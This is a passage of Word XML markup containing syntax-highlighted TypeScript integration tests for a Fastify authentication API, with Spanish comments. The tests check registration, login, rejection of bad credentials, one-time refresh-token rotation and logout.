      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">repeat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">64</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app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buildApp</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app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongoContainer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redisContainer }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/routes/__tests__/auth.integration.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> beforeAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> afterAll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 setupTestEnv } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../../../test/setup'</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FastifyInstance } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fastify'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Auth API Integration'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app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FastifyInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">beforeAll</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env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setupTestEnv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">app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afterAll</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'POST /auth/register crea un nuevo usuario'</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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/register'</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username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'testuser'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'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statusCode</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201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(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</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'testuser'</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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">passwordHash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeUndefined</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'POST /auth/login retorna tokens válidos'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Primero registrar</w:t>
      </w:r>
      <w:r>
        <w:br/>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/register'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'logintest'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'logintest'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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statusCode</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200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(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeDefined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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">accessToken</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'string'</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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</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'logintest'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'POST /auth/login rechaza credenciales incorrectas'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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nope'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'wrong'</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statusCode</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401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(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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(body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Invalid'</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'POST /auth/refresh rota el refresh token (one-time use)'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Login para obtener cookie de refresh</w:t>
      </w:r>
      <w:r>
        <w:br/>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/register'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'refreshuser'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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loginRes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'refreshuser'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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setCookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> loginRes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'set-cookie'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(setCookie)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeDefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Primer refresh exitoso</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refresh1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/refresh'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setCookie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(refresh1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">statusCode</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200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Segundo refresh con mismo token debe fallar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> refresh2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/refresh'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setCookie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(refresh2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">statusCode</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401</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'POST /auth/logout invalida el refresh token'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loginRes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'/api/v1/auth/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'refreshuser'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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setCookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> loginRes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
